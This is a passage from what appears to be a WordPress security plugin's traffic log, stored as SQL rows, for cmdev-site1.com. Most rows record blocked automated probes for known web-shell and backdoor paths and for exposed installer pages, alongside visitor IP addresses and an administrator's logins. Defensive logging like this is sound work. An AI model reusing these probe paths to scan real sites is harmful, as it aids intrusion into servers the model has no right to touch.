Safari\\/537.36\",\"2\":\"www.google.com\"}','eObT6rfEaydv5QuIlzRY092t',0,1680404059.5338,329,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Yg7Qek5CpT1lVdvGZDia4389',0,1680404060.6108,302,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/wp-content/plugins/anttt/simple.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','lh3NYIFy8nd9kWrZJeTQUgSC',0,1680404638.4373,1853,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','bkCKvh2f8WtaHjAixLQYgd7s',0,1680404641.1301,307,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','faGt32pPcCJuNoRqlwk0QZ98',0,1680404644.2982,308,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nszFWwjH32D5ZO0igYhMSCR6',0,1680404645.3498,346,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/test/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','0nx9WSbjJFk2gzVLhuYqwda4',0,1680410498.8975,293,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/blog/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','IQW8B6orYVuhq73Cw4MpnkGT',0,1680410499.7167,320,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/cms/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','sx0a6durFwgtilApbSCYy8oj',0,1680410500.5816,285,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/web/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','WAveRTh7pnac6CXiFwHsIOld',0,1680410501.9522,349,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/backup/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','PqfpewYDkG95a1SvuA8OWQbg',0,1680410502.8346,290,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/site/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','r2xvkehaFZus0tGE69K4lNAi',0,1680410503.6434,279,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/oldsite/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','kpHBN3x9nAzTFbQrqym0U41S',0,1680410504.5132,286,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','2UAcKZ1M9GwgF4LR7etYXrlI',0,1680411126.5095,463,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-admin/js/widgets/wp-login.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','sjSQ4hlEBUgmtPOKRZM7q1La',0,1680411127.8079,296,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-includes/wp-system-cloud.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','tUyad7zSrvkI4cYuQmlpPiT3',0,1680411128.8896,278,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-includes/class-wp-page-icon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','NzuroVxWncjp394t1akUwg8C',0,1680411129.8673,322,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Lp832BG1m7cJsQPxM6Y0fTN5',0,1680411130.9154,314,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','oEQ2lLXCbHshmdMZYB3qeNvW',0,1680411686.1944,1663,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-admin/js/widgets/wp-login.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','aUTNBVZy8uhz4vC9cinDKwSq',0,1680411688.6773,317,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-includes/wp-system-cloud.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','edoszfDRHFX1UcI45jr97SCu',0,1680411689.7005,290,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-includes/class-wp-page-icon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','iGnCDqtVlJr12SLx3EgoUAfQ',0,1680411690.6926,280,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','https://cmdev-site1.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','MNseWTPwGfDSqdnYLJkH8X5t',0,1680411691.7185,308,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/wordpress/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','n8wdRFkBx7qtVe0rf9Lz5i2K',0,1680416824.9184,302,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/test/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','3KMAxNbt8olphPangD4ZymCR',0,1680416825.8235,394,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/blog/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','a8SlDjyNhBbf915YidoIHOr6',0,1680416827.8286,300,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/cms/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','bdf1ysSRAoc89TFBmatIup3V',0,1680416828.6933,349,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/web/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','wzibpjhDlHdOY94sVR7fkZuy',0,1680416829.5960,332,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/backup/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','MGkriexLphgnZWEK1buICdTj',0,1680416830.5074,346,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/site/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','HE9za2I7NtWnsbL05XyTRFkA',0,1680416831.4041,302,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/oldsite/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','jxLR58qKbJG0u2nXBfgcNwa9',0,1680416832.2605,285,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/wp-content/plugins/anttt/simple.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9KQChqxlS76AidawBVU18cek',0,1680576878.7175,1950,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','gaA7jHYZTq1JVfR8vUtKNzS9',0,1680576881.7613,305,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','3bTcGkl4hdjtFAQUNzYfoauR',0,1680576882.6240,291,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','5KR0cDqI27kPaVwGuNsUxFME',0,1680576883.7113,404,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nFbDi7812rwOopCVdLezQqx9',0,1680578463.7327,4736,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','eiKglQ2ZXLt1PMJkYsOAynqR',0,1680578469.2118,293,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','k5qiDWwLdeHznytG37EupTbK',0,1680586591.9851,840,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-admin/js/widgets/wp-login.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','lJZ1OseYod4S2g9VKL3wA5iq',0,1680586593.5408,309,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-includes/wp-system-cloud.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','FQm5bd74IpsJ8xWyZPTSiv36',0,1680586594.6648,308,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-includes/class-wp-page-icon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','mQ857XCORDfH3j2LFPiaNn6h',0,1680586595.7014,310,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','https://cmdev-site1.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','skWQavZLAxlTJ30UfYSyOnI5',0,1680586596.7589,313,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/wp/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','sW78gOpYfbVxecUk0ZRhlvuP',0,1680589057.4311,781,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/new/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','bcOXrT1yhuH3MRJYVoFDl6nd',0,1680589058.7386,283,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/old/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','FkpGcB1txDJ0HPEA4Qd2Ijnh',0,1680589059.5693,301,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/wordpress/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','cJIoX9rl20FkHQPVOBCZg8Sw',0,1680589060.3826,282,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/test/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','Y8PFxQcnCUBlkoE19zAjLg3v',0,1680589061.2096,285,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/blog/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','0M6fgaCNoqBItcHkmjzVEGZ1',0,1680589062.0488,301,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/cms/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','7uJgTjRXxnp2o6NWG3E9LUHA',0,1680589062.8970,304,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/web/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','3VHWRD8nsiKTgMXfu4p61Ncd',0,1680589063.7874,339,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/backup/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','O5lCcExIhW64dv7uwB9yTrHf',0,1680589064.6834,280,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/site/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','qs3lDNJ7PwQ6rLoKfYd8GcVE',0,1680589065.5301,287,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/oldsite/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','pBcZl2eOM6gsjkPb3Dwt9NJf',0,1680589066.3948,284,'','GET',403,0,700,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?interim-login=1&wp_lang=en_US\"}','zoSeFGwNlWHfgsLZdikvMOc9',3,1680612422.3969,477,'','POST',200,0,600,0,1,'',510),('67.198.116.43',1137079339,'','http://cmdev-site1.com/edit.php?post_type=page','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/?et_fb=1&et_bfb=1&PageSpeed=off\"}','UuhcNKOj4Wwoz9kZL2G1sMA5',0,1680612438.0015,327,'','GET',403,0,700,0,1,'',510),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/?action=logout&_wpnonce=a8a348d68d','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-admin\\/\"}','XuTOjoqWVKR93I45MEDJl8Ak',3,1680612504.6941,442,'','GET',302,0,600,0,1,'',510),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?loggedout=true\"}','Ym6JTPK8GwbhZuxRDkIfnpcd',3,1680612509.0446,450,'','POST',302,0,600,0,1,'',510),('173.212.218.52',2916407860,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','YCMkNp79OBA5Ud2IEWsTaDwc',0,1680616550.6595,1672,'','GET',403,0,700,0,1,'',0),('173.212.218.52',2916407860,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','CZBNi3oqMEK0OuFdYhH6wpQt',0,1680616553.1959,288,'','GET',403,0,700,0,1,'',0),('20.244.37.144',351544720,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','QmRDSGocr6HOLealXEWyMu7T',0,1680617427.6472,2049,'','GET',403,0,700,0,1,'',0),('20.244.37.144',351544720,'','http://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','JMcAK9Tr5pLjbm3vFlhXSdok',0,1680617427.5882,2108,'','POST',403,0,700,0,1,'',0),('20.244.37.144',351544720,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','QlK9S5boxkUR3Fy6mzXLpNv2',0,1680617431.0639,2376,'','GET',403,0,700,0,1,'',0),('20.244.37.144',351544720,'','https://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fq7PRtpZmxb4UcDogvO36wG2',0,1680617431.2573,2487,'','POST',403,0,700,0,1,'',0),('20.244.37.144',351544720,'','http://cmdev-site1.com/alfacgiapi/perl.alfa','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','K2uohsEfr3QLbmCjYOBVHMIx',0,1680617436.1451,418,'','POST',403,0,700,0,1,'',0),('20.244.37.144',351544720,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Yy4CJaG0uUP23rg9hXEQB7AZ',0,1680617443.3220,280,'','GET',403,0,700,0,1,'',0),('20.244.37.144',351544720,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','PDqAZ9yxSdnvmMV65l7hcwg2',0,1680617444.0181,328,'','GET',403,0,700,0,1,'',0),('20.244.37.144',351544720,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','jamTiDJOdyBY5EKAWStwFCxG',0,1680617444.7703,305,'','GET',403,0,700,0,1,'',0),('20.244.37.144',351544720,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','nAo3Xj0f2arLk74Izl9huKEY',0,1680617445.4666,277,'','GET',403,0,700,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/?action=logout&_wpnonce=206966c4b8','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-admin\\/edit.php?post_type=page\"}','5yUPohFEwuXB8zNVRTevd9sK',3,1680627822.0134,398,'','GET',302,0,600,0,1,'',510),('217.64.127.195',3644882883,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) 